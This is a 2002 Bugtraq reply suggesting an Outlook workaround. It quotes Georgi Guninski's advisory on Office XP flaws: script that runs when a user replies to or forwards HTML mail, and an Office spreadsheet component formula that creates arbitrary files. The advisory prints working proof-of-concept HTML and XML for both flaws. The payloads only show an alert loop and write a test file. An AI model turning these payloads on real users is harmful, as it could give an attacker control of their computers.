RE: More Office XP problems

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Worth noting that this problem (the Outlook part anyhow) appears to actually
be a Word vulnerability in that it only affects people who use the WordMail
editor.  People who use the default Outlook editor are apparently not
affected by the forward/reply vulnerability. for more info.

That's not to suggest that it isn't a vulnerability that shouldn't be fixed
- just that there appears to be a fairly easy workaround and not all users
are affected to begin with.

To work-around this problem in Outlook go to Tools | Options | Mail Format
and uncheck the boxes for "Use Word to..."  That will cause Outlook to use
it's own native editor for such things and shuts the window on this exploit.


Ben M. Schorr, MVP-Outlook, CNA, MCPx3
Director of Information Services
Damon Key Leong Kupchak Hastert

> -----Original Message-----
> From: Georgi Guninski []
> Sent: Sunday, March 31, 2002 2:32 AM
> To: Bugtraq
> Subject: More Office XP problems
> Moderator: check the legal notice before submitting this to
> some database.
> Georgi Guninski security advisory #53, 2002
> More Office XP problems
> Systems affected:
> Office XP
> Risk: High
> Date: 31 March 2002
> Legal Notice:
> This Advisory is Copyright (c) 2002 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or distribute parts of it 
> without the author's written permission. If you want to link to this 
> content use the URL:$oxp-2.html
> Disclaimer:
> The information in this advisory is believed to be true
> though it may be false. The opinions expressed in this 
> advisory and program are my own and not of any company. The 
> usual standard disclaimer applies, especially the fact that 
> Georgi Guninski is not liable for any damages caused by 
> direct or  indirect use of the information or functionality 
> provided by this advisory or program. Georgi Guninski bears 
> no responsibility for content or misuse of this advisory or 
> program or any derivatives thereof.
> Description:
> Actually there are at least two vulnerabilities in Office XP.
> 1. It is possible to embed active content (object + script) 
> in HTML mail which is triggered if the user choses reply or 
> forward to the mail. This opens an exploit scenario for 
> forcing the user to visit a page in the internet zone of IE 
> at least. For another exploit scenario check (2) 2. There is 
> a bug in ms spreadsheet compononent. Namely in its Host() 
> function which may be exploited with the help of (1) or 
> probably from any document opened with Office application. 
> This buggy function allows creating files with arbitrary 
> names and their content may be specified to some extent at 
> which is sufficient to place an executable file (.hta) in 
> user's startup directory which may lead to taking full 
> control over user's computer. This probably may be called 
> cross application scripting because one application uses 
> object from another application.
> Details:
> The following must be put in HTML email which should be
> opened with Outlook XP and the user should chose reply or forward.
> 1.
> --------------------------------------
> <OBJECT id=WebBrowser1 height=150 width=300
> classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
> <PARAM NAME="ExtentX" VALUE="7938">
> <PARAM NAME="ExtentY" VALUE="3969">
> <PARAM NAME="ViewMode" VALUE="0">
> <PARAM NAME="Offline" VALUE="0">
> <PARAM NAME="Silent" VALUE="0">
> <PARAM NAME="RegisterAsBrowser" VALUE="1">
> <PARAM NAME="RegisterAsDropTarget" VALUE="1">
> <PARAM NAME="AutoArrange" VALUE="0">
> <PARAM NAME="NoClientEdge" VALUE="0">
> <PARAM NAME="AlignLeft" VALUE="0">
> <PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
> <PARAM NAME="Location" 
> VALUE="about:/dev/random&lt;script&gt;while (42) 
> alert('HOHOHO\nTrying to sell trustworthy 
> computing\nHOHOHO')&lt;/script&gt;">
> <PARAM NAME="ReadyState" VALUE="4">
> -------------------------------------
> 2.
> The office spreadsheet component is something like mini
> excel. It may be embeded in web pages (seems not exploitable) 
> and in office documents (seems exploitable). It supports the 
> Host() function which returns the hosting object. So if you 
> put in formula '=Host().SaveAs("name")' file with name shall 
> be created.
> [Note, lines may be wrapped]
> ---------------------------------------
> <h1>
> Hehe. Triyng to sell trustworthy computing.
> </h1>
> <object
>     classid="CLSID:0002E551-0000-0000-C000-000000000046"
> id=Spreadsheet1
>     v:shapes="_x0000_s1026" class=shape width=81 height=81
>     u1:shapes="_x0000_s1025">
>     <param name=DataType value=XMLURL>
>     <param name=XMLData
>     value="&lt;?xml 
> version=&quot;1.0&quot;?&gt;&#13;&#10;&lt;ss:Workbook 
> xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;&#1
> 3;&#10; 
> xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;&#13;&#10; 
> xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&qu
> ot;&#13;&#10; 
> xmlns:c=&quot;urn:schemas-microsoft-com:office:component:sprea
> dsheet&quot;&#13;&#10; 
> xmlns:html=&quot;;&gt;&#13;&#10; 
> &lt;x:ExcelWorkbook&gt;&#13;&#10;  
> &lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;&#13
> ;&#10;  
> &lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;&#13;&#10; 
> &lt;/x:ExcelWorkbook&gt;&#13;&#10; 
> &lt;ss:Styles&gt;&#13;&#10;  &lt;ss:Style 
> ss:ID=&quot;Default&quot;&gt;&#13;&#10;   &lt;ss:Alignment 
> ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot; 
> ss:Vertical=&quot;Bottom&quot;&#13;&#10;    
> ss:ReadingOrder=&quot;Context&quot;/&gt;&#13;&#10; 
> &lt;ss:Borders&gt;&#13;&#10;   &lt;/ss:Borders&gt;&#13;&#10;  
>  &lt;ss:Font ss:FontName=&quot;Arial&quot; 
> ss:Size=&quot;10&quot; ss:Color=&quot;Automatic&quot; 
> ss:Bold=&quot;0&quot;&#13;&#10;    ss:Italic=&quot;0&quot; 
> ss:Underline=&quot;None&quot;/&gt;&#13;&#10;   
> &lt;ss:Interior ss:Color=&quot;Automatic&quot; 
> ss:Pattern=&quot;None&quot;/&gt;&#13;&#10;   
> &lt;ss:NumberFormat 
> ss:Format=&quot;General&quot;/&gt;&#13;&#10;   &lt;ss:Protection 
> ss:Protected=&quot;1&quot;/&gt;&#13;&#10;  
> &lt;/ss:Style&gt;&#13;&#10; &lt;/ss:Styles&gt;&#13;&#10; 
> &lt;c:ComponentOptions&gt;&#13;&#10;  
> &lt;c:Label&gt;&#13;&#10;   &lt;c:Caption&gt;Microsoft Office 
> Spreadsheet&lt;/c:Caption&gt;&#13;&#10; 
>   &lt;/c:Label&gt;&#13;&#10;  
> &lt;c:PreventPropBrowser/&gt;&#13;&#10;  
> &lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;&#13;&#10;  
> &lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;&#13;&#10;  
> &lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;&#13;&#10; 
> &lt;/c:ComponentOptions&gt;&#13;&#10; 
> &lt;x:WorkbookOptions&gt;&#13;&#10;  
> &lt;c:OWCVersion&gt;         
> &lt;/c:OWCVersion&gt;&#13;&#10;  
> &lt;x:DisableUndo/&gt;&#13;&#10; 
> &lt;/x:WorkbookOptions&gt;&#13;&#10; &lt;ss:Worksheet 
> ss:Name=&quot;Sheet1&quot;&gt;&#13;&#10;  
> &lt;x:WorksheetOptions&gt;&#13;&#10;   
> &lt;x:Selected/&gt;&#13;&#10;   
> &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;
> &#10;   &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10; 
> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;   
> &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&
> #10;   
> &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&
> #10;  &lt;/x:WorksheetOptions&gt;&#13;&#10; 
> &lt;c:WorksheetOptions&gt;&#13;&#10;  
> &lt;/c:WorksheetOptions&gt;&#13;&#10;  &lt;ss:Table 
> ss:ExpandedColumnCount=&quot;1&quot; 
> ss:ExpandedRowCount=&quot;1&quot;&#13;&#10;   
> ss:DefaultColumnWidth=&quot;48.0&quot; 
> ss:DefaultRowHeight=&quot;12.75&quot;&gt;&#13;&#10;   
> &lt;ss:Row&gt;&#13;&#10;    &lt;ss:Cell 
> ss:Formula='=HOST().SaveAs(&quot;C:\GGGG5&quot;)'&gt;&#13;&#10
> ;     &lt;ss:Data 
> ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;&#13;&#10; 
> &lt;/ss:Cell&gt;&#13;&#10;   &lt;/ss:Row&gt;&#13;&#10;  
> &lt;/ss:Table&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10; 
> &lt;ss:Worksheet ss:Name=&quot;Sheet2&quot;&gt;&#13;&#10;  
> &lt;x:WorksheetOptions&gt;&#13;&#10; 
> &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;
> &#10;   &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10; 
>   &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10; 
> &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&
> #10;   
> &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&
> #10;  &lt;/x:WorksheetOptions&gt;&#13;&#10;  
> &lt;c:WorksheetOptions&gt;&#13;&#10; 
> &lt;/c:WorksheetOptions&gt;&#13;&#10; 
> &lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet 
> ss:Name=&quot;Sheet3&quot;&gt;&#13;&#10;  
> &lt;x:WorksheetOptions&gt;&#13;&#10;   
> &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10; 
> &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;   
> &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;   
> &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10; 
> &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&
> #10;  &lt;/x:WorksheetOptions&gt;&#13;&#10;  
> &lt;c:WorksheetOptions&gt;&#13;&#10;  
> &lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10; 
> &lt;o:DocumentProperties&gt;&#13;&#10;   
> &lt;o:Author&gt;ad&lt;/o:Author&gt;&#13;&#10;   
> &lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;&#13;&#10;   
> &lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;&#13;&#10; 
> &lt;o:Company&gt;g&lt;/o:Company&gt;&#13;&#10;   
> &lt;o:Version&gt;10.2625&lt;/o:Version&gt;&#13;&#10;  
> &lt;/o:DocumentProperties&gt;&#13;&#10;  
> &lt;o:OfficeDocumentSettings&gt;&#13;&#10;   
> &lt;o:DownloadComponents/&gt;&#13;&#10; 
> &lt;o:LocationOfComponents 
> HRef=&quot;file:///E:\&quot;/&gt;&#13;&#10;  
> &lt;/o:OfficeDocumentSettings&gt;&#13;&#10;&lt;/ss:Workbook&gt
> ;&#13;&#10;">
>     <param name=AllowPropertyToolbox value=0>
>     <param name=AutoFit value=0>
>     <param name=Calculation value=-4105>
>     <param name=Caption value="Microsoft Office Spreadsheet">
>     <param name=DisplayColumnHeadings value=-1>
>     <param name=DisplayGridlines value=-1>
>     <param name=DisplayHorizontalScrollBar value=-1>
>     <param name=DisplayOfficeLogo value=-1>
>     <param name=DisplayPropertyToolbox value=0>
>     <param name=DisplayRowHeadings value=-1>
>     <param name=DisplayTitleBar value=0>
>     <param name=DisplayToolbar value=-1>
>     <param name=DisplayVerticalScrollBar value=-1>
>     <param name=DisplayWorkbookTabs value=-1>
>     <param name=EnableEvents value=-1>
>     <param name=MaxHeight value="80%">
>     <param name=MaxWidth value="80%">
>     <param name=MoveAfterReturn value=-1>
>     <param name=MoveAfterReturnDirection value=-4121>
>     <param name=RightToLeft value=0>
>     <param name=ScreenUpdating value=-1>
>     <param name=EnableUndo value=0>
>    </object>
> ---------------------------------
> Workaround/Solution:
> The solution is to get a real mail client and office
> applications. Workaround for this particular problem is: For 
> (1) - disable everything that contains "active" in IE. For 
> (2) - (Have not tested it personally) Deregister and delete 
> the ms office spreadsheet component
> Vendor status:
> Microsoft was notified on 17 March 2002.
> They had 2 weeks to produce a patch but didn't.
> Regards,
> Georgi Guninski

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